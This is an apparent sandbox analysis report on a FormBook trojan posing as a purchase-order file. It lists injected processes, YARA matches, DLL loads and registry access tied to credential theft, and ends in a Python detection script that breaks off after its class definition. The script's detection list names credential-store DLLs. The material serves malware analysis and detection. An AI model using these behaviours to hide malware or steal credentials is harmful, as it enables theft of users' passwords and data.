            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03003FD5 1_2_03003FD5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03049EB0 1_2_03049EB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03043D40 1_2_03043D40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F1D5A 1_2_030F1D5A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F7D73 1_2_030F7D73
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0305FDC0 1_2_0305FDC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B9C32 1_2_030B9C32
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FFCF2 1_2_030FFCF2
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe | Code function: 2_2_0389F3CE 2_2_0389F3CE
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe | Code function: 2_2_0387E9DE 2_2_0387E9DE
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe | Code function: 2_2_0388095E 2_2_0388095E
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe | Code function: 2_2_03887049 2_2_03887049
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe | Code function: 2_2_0388704E 2_2_0388704E
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe | Code function: 2_2_0388073E 2_2_0388073E
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe | Code function: 2_2_03880735 2_2_03880735
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe | Code function: 2_2_03888E7E 2_2_03888E7E
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02FC02C0 3_2_02FC02C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02FE0274 3_2_02FE0274
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_030003E6 3_2_030003E6
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F4E3F0 3_2_02F4E3F0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02FFA352 3_2_02FFA352
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_030001AA 3_2_030001AA
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02FD2000 3_2_02FD2000
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02FF81CC 3_2_02FF81CC
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02FF41A2 3_2_02FF41A2
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02FC8158 3_2_02FC8158
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02FDA118 3_2_02FDA118
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F30100 3_2_02F30100
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F5C6E0 3_2_02F5C6E0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F3C7C0 3_2_02F3C7C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F40770 3_2_02F40770
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F64750 3_2_02F64750
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02FEE4F6 3_2_02FEE4F6
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_03000591 3_2_03000591
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02FF2446 3_2_02FF2446
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02FE4420 3_2_02FE4420
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F40535 3_2_02F40535
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F3EA80 3_2_02F3EA80
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02FF6BD7 3_2_02FF6BD7
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02FFAB40 3_2_02FFAB40
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F6E8F0 3_2_02F6E8F0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F268B8 3_2_02F268B8
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_0300A9A6 3_2_0300A9A6
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F4A840 3_2_02F4A840
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F42840 3_2_02F42840
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F429A0 3_2_02F429A0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F56962 3_2_02F56962
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02FFEEDB 3_2_02FFEEDB
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F52E90 3_2_02F52E90
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02FFCE93 3_2_02FFCE93
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F40E59 3_2_02F40E59
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02FFEE26 3_2_02FFEE26
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F32FC8 3_2_02F32FC8
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02FBEFA0 3_2_02FBEFA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02FB4F40 3_2_02FB4F40
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F60F30 3_2_02F60F30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02FE2F30 3_2_02FE2F30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F82F28 3_2_02F82F28
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F30CF2 3_2_02F30CF2
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02FE0CB5 3_2_02FE0CB5
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F40C00 3_2_02F40C00
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 3_2_02F3ADE0 3_2_02F3ADE0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F58DBF3_2_02F58DBF
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FDCD1F3_2_02FDCD1F
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F4AD003_2_02F4AD00
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F5D2F03_2_02F5D2F0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FE12ED3_2_02FE12ED
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F5B2C03_2_02F5B2C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F452A03_2_02F452A0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F8739A3_2_02F8739A
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F2D34C3_2_02F2D34C
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FF132D3_2_02FF132D
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FF70E93_2_02FF70E9
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FFF0E03_2_02FFF0E0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FEF0CC3_2_02FEF0CC
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F470C03_2_02F470C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_0300B16B3_2_0300B16B
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F4B1B03_2_02F4B1B0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F2F1723_2_02F2F172
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F7516C3_2_02F7516C
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FF16CC3_2_02FF16CC
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F856303_2_02F85630
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FFF7B03_2_02FFF7B0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F314603_2_02F31460
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FFF43F3_2_02FFF43F
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_030095C33_2_030095C3
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FDD5B03_2_02FDD5B0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FF75713_2_02FF7571
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FEDAC63_2_02FEDAC6
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FDDAAC3_2_02FDDAAC
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F85AA03_2_02F85AA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FE1AA33_2_02FE1AA3
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FB3A6C3_2_02FB3A6C
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FFFA493_2_02FFFA49
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FF7A463_2_02FF7A46
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FB5BF03_2_02FB5BF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F7DBF93_2_02F7DBF9
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F5FB803_2_02F5FB80
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FFFB763_2_02FFFB76
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F438E03_2_02F438E0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FAD8003_2_02FAD800
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F499503_2_02F49950
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F5B9503_2_02F5B950
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FD59103_2_02FD5910
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F49EB03_2_02F49EB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F03FD23_2_02F03FD2
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F03FD53_2_02F03FD5
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FFFFB13_2_02FFFFB1
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F41F923_2_02F41F92
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FFFF093_2_02FFFF09
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FFFCF23_2_02FFFCF2
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FB9C323_2_02FB9C32
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F5FDC03_2_02F5FDC0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FF7D733_2_02FF7D73
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02FF1D5A3_2_02FF1D5A
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02F43D403_2_02F43D40
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_025A1AB03_2_025A1AB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_0259CA303_2_0259CA30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_0259CA273_2_0259CA27
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_0259CC503_2_0259CC50
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_0259ACD03_2_0259ACD0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_025A33403_2_025A3340
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_025A333B3_2_025A333B
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_025A51703_2_025A5170
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_025BB6C03_2_025BB6C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02D9E2D53_2_02D9E2D5
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02D9E3FB3_2_02D9E3FB
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02D9D7F83_2_02D9D7F8
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 3_2_02D9E78C3_2_02D9E78C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 030AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0302B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 030BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03075130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03087E54 appears 107 times
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: String function: 002D7750 appears 42 times
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: String function: 002CF885 appears 68 times
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: String function: 02FAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: String function: 02FBF290 appears 103 times
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: String function: 02F75130 appears 58 times
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: String function: 02F87E54 appears 107 times
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: String function: 02F2B970 appears 262 times
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe, 00000000.00000003.1696544060.0000000004B4D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO 09110124 EXPRESS SYSTEM-SESB24066.exe
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe, 00000000.00000003.1698346839.00000000049F3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO 09110124 EXPRESS SYSTEM-SESB24066.exe
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.350000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 1.2.svchost.exe.350000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 00000001.00000002.1875511422.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 00000003.00000002.3539826288.0000000002590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 00000007.00000002.3541474602.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 00000003.00000002.3541533623.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 00000003.00000002.3541294212.0000000002B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 00000001.00000002.1886212740.0000000007DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 00000002.00000002.3541732064.0000000003750000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
            Source: 00000001.00000002.1879537533.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116
            Rule metadata for Windows_Trojan_Formbook_1112e116 (identical on each of the ten matches above): reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@16/10
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002FD712 GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002EB8B0 AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002EBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002FEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002F6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_0030C604 CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Code function: 0_2_002B31F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | File created: C:\Users\user\AppData\Local\Temp\aut869C.tmp
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: RMActivate_ssp.exe, 00000003.00000003.2105280358.0000000002931000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000002.3540149813.0000000002931000.00000004.00000020.00020000.00000000.sdmp, RMActivate_ssp.exe, 00000003.00000003.2105173096.0000000002910000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe | ReversingLabs: Detection: 26%
            Source: PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Virustotal: Detection: 33%
            Source: unknown | Process created: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe"
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe"
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe | Process created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe | Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
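The behaviour entries above are what a detection engineer would key on rather than the file hash: svchost.exe is created with the dropper's own command line (the hollowed host), RMActivate_ssp.exe is spawned from a random-named Program Files directory and then launches Firefox, and RMActivate_ssp.exe loads winsqlite3.dll, vaultcli.dll and dpapi.dll (the Chrome "Login Data" schema string and the Outlook profile key access fit the same credential-theft stage). Two caveats from the report itself: the string-function offsets recur in svchost.exe and RMActivate_ssp.exe at different bases, so both hold the same injected payload, and the "Chrome.pdb" path from Joe Security's FakeChrome tool among the binary strings shows that ZQphKCYQofBW.exe is a relaunched copy of the sandbox's decoy Chrome, so its file name will not transfer to a real host. The Python below is an added example written for this page, not Joe Sandbox or FormBook code: it runs three checks (image/command-line mismatch, browser launched by a System32/SysWOW64 binary, credential-store DLL set loaded by a non-browser) over constructed process-telemetry events modelled on the lines above. The ProcEvent schema, the pids and the benign chrome.exe control event are assumptions, not anything the report records.

```python
"""Flag the process-chain and DLL-load behaviour from this report in process telemetry.

Added example for this page, not part of the Joe Sandbox report. The events below are
constructed to mirror the report's process tree and 'Section loaded' entries; the
ProcEvent fields are an assumed, simplified telemetry schema, not a vendor format.
"""
from __future__ import annotations

import ntpath
from dataclasses import dataclass, field

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
# Together these give a process Chromium 'Login Data' access (winsqlite3), the
# Credential Manager vault (vaultcli) and DPAPI unprotection (dpapi): a browser
# loads them legitimately, RMActivate_ssp.exe has no reason to.
CRED_STORE_DLLS = {"winsqlite3.dll", "vaultcli.dll", "dpapi.dll"}


@dataclass
class ProcEvent:
    pid: int
    image: str                 # path of the executable actually running
    cmdline: str               # command line the process was created with
    parent_image: str          # path of the parent's executable
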